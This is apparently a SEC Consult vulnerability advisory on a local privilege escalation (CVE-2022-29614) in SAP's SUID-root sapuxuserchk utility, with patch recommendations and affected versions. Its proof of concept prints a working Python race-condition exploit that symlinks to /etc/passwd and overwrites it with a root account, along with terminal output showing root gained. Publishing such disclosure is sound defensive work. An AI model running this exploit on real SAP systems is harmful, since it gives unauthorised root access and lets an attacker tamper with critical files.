Local privilege escalation in SAP® SAPControl Web Service Interface (sapuxuserchk)

Vendor description

"The SAP Start Service (sapstartsrv) provides basic management services for systems and instances and single server processes. Services include starting and stopping, monitoring the current run-time state, reading logs, traces and configuration files, executing commands and retrieving other technology-specific information, like network access points, active sessions, thread list etc. They are exposed by a SOAP Web service interface named "SAPControl". This paper describes how to use this Web service interface."

Source: https://assets.cdn.sap.com/sapcom/docs/2016/09/0a40e60d-8b7c-0010-82c7-eda71af511fa.pdf

Business recommendation

SEC Consult recommends to implement the security note 3158619, where the documented issue is fixed according to the vendor. We advise installing the corrections as a matter of priority to keep business-critical data secured.

Vulnerability overview/description

1) Local privilege escalation (CVE-2022-29614)

The SUID-root program sapuxuserchk erroneously follows the symbolic link to create a temporary local logon ticket and change the ownership of the target file for owner access only. As member of the group sapsys, a user can therefore escalate his/her privileges to root on a local Unix system by successfully exploiting a race condition.

Proof of concept

The utility sapuxuserchk is used by sapcontrol to request a temporary local logon ticket in the following way. As a result, the ticket is created in the folder /usr/sap/SEC/D00/work/sapcontrol_logon/

$ sapcontrol -nr 0 -function RequestLogonFile user0

$ ls -l logon*
-rw------- 1 secadm sapsys 40 Feb 25 08:58 logon0
-rw------- 1 user0  users  40 Feb 25 09:00 logon1
-rw------- 1 root   root   40 Feb 25 09:01 logon2

Since sapcontrol is supposed to create the ticket for any system user, it requires a utility with SUID bit set. The owner, group and its permission bits of sapuxuserchk of a standard installation are shown below.

$ ls -l sapuxuserchk
-rwsr-x--- 1 root sapsys 1312137 Feb 28  2019 sapuxuserchk

The request originating from sapcontrol is first sent to the instance server sapstartsrv, piping into sapuxuserchk a 512-byte encrypted message, which contains the ticket path, user name and ticket in the plaintext, as an example shown below.

$ strings input-0-plaintext
SAPLOGONFILE /usr/sap/SEC/D00/work/sapcontrol_logon/logon1
 user0
1133146902252676394602837452470900726967

On its duty to create the ticket, sapuxuserchk performs the sanity check to guarantee the non-existence of the file prior to the creation in the function internal_create_saplogon_file. However, it introduces a race condition between the stat and open calls, as shown by the following excerpt from strace.

stat("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", 0x7ffc0d2e1530) = -1 ENOENT (No such file or directory)
open("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", O_RDWR|O_CREAT|O_TRUNC, 0600) = 3
	fchown(3, 1000, 100)

The attacker can run a race of constantly creating a symbolic link logon1 pointing to a privileged file such as /etc/passwd and meanwhile invoke the SUID-root program sapuxuserchk, in the hope that the creation of the link take place between the stat and open calls, so that the first will fail, (meaning that the file does not exist yet) while the second as well as the ensuing fchown call succeeds. In a positive result, the attacker gains the read-write permission of the target file.

The following run to winning the race took 629 attempts to finally gain the root privilege. The PoC further below lists the exploit implementing the idea above with a pre-intercepted message for user secadm.

sh-4.3$ id
uid=1001(secadm) gid=474(sapsys) groups=474(sapsys),1000(sapinst)

sh-4.3$ ls -l /etc/passwd
-rw-r--r-- 1 root root 2517 Feb 25 00:47 /etc/passwd

sh-4.3$ python3 sapmatt.py 
this many tries: 629
[+] now login as sapmatt

sh-4.3$ su sapmatt
Password: 

sh-4.3# id
uid=0(sapmatt) gid=0(root) groups=0(root)

sh-4.3# ls -l /etc/passwd
-rw-r--r-- 1 secadm sapsys 73 Feb 25 10:03 /etc/passwd


$ cat sapmatt.py
import sys, os, signal, base64, random, string

secadm_msg = b'O9OXlWwex4ddSI5vhXFfUQvZ8Td3NWzRNIb9QN6bHY764Z0zVNuVjFHRGhHEgYgwNQDnf0/bBwzlEXCSXFkhtiDqDohuyCxG4mtRqc86FlB6DTOjBY9o/6Cb3rRSZ58jggx71JXMRk21jW3gqdem+tmqHCnIumZjodk2cuk5/MY76dsD65s3j1XrQS0RT3gPaspl/6Yb842hbVTZXVRY3cHKzNq5tZMKB2LmyyslO4xCI00eBN6k6yEKNFLvMx8lYbAIaHcfdWu3pMWVIb9rT3BoTCHwi5hBz8dHk6usdEw05q/Xuxe28gxWCUZpN09sYsd/5R8HqqLfwyiNI7CTBCA3f+fHUweJPuteD5O8bwo/mEOShHimO1gPZzhBdow2C0JszYQeQpxgRtENXPUt2qgT7TJqmItxM0puB8ry0TnKJIbk5gj0smflBPBZyTDXl+qNUmgWL1dK/SBpTUErGMVXFVBi8bNDMSUhcJa+0IQlYSBHPln17kquqhGvlRYYZVJttDNoYcvBchc4HxHZmH5pHkD4fhbcQgFT0UFgceSH1j3sE6G/M/QM1X/vTVE4534XJ3mDcFk/brOYun1dawJ30BkJ9HbP5weihwRwspOq52qRZ9CXsnJCtFPNqNWNIe8BgQUW8WV7FkiDJ+Lpp0pq8KLlZ0Yomz46YfCHkag='
# openssl passwd sappass
u1_passwd = "sapmatt:wPi023oIkjHdA:0:0::/root:/bin/sh\nsecadm:x:1001:474::/tmp:/bin/sh\n"
logon_symlink = "/usr/sap/SEC/D00/work/sapcontrol_logon/logon1"
target_file = "/etc/passwd"

g = 1024
if not os.path.isfile(logon_symlink):
        os.system("touch " + logon_symlink)
secadm_msg = base64.b64decode(secadm_msg)

msg_file = '/tmp/msg' + ''.join(random.choice(string.ascii_letters) for i in range(8))
f0 = open(msg_file, "wb")
f0.write(secadm_msg)
f0.close()

pid = os.fork()
if pid == 0:
        j = 0
        while True:
                if j > g:
                        print('done')
                        os._exit(os.EX_OK)
                j += 1
                os.system("/usr/sap/SEC/D00/exe/sapuxuserchk < {0} > /dev/null".format(msg_file))
else:
        i = 0
        uid = os.getuid()
        success = False
        while not success:
                if i > g:
                        print("[-] give up, link too many tries: " + str(i))
                        break
                i += 1
                try:
                        os.unlink(logon_symlink)
                        os.symlink(target_file, logon_symlink)
                        statinfo = os.stat(target_file)
                        if statinfo.st_uid == uid:
                                os.kill(pid, signal.SIGILL)
                                print("this many tries: " + str(i))
                                print("[+] now login as sapmatt ")
                                f = open(target_file, "w")
                                f.write(u1_passwd)
                                f.close()
                                success = True
                except Exception as err:
                        print('[-] lost the race {0}'.format(err))
        os.waitpid(pid, 0)
        os.unlink(msg_file)

Vulnerable / tested versions

The following version of the binary was found to be vulnerable during our tests:

• Version: 753, patch 400, changelist 1906766

According to the vendor the following products are affected by the discovered vulnerability:

SAP NetWeaver AS ABAP, AS Java, ABAP Platform and HANA Database, Versions:

• KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, 7.88
• KRNL64NUC 7.22, 7.22EXT, 7.49
• KRNL64UC 7.22, 7.22EXT, 7.49, 7.53
• SAPHOSTAGENT 7.2

Please refer to the vendor patch day post: https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10

Vendor contact timeline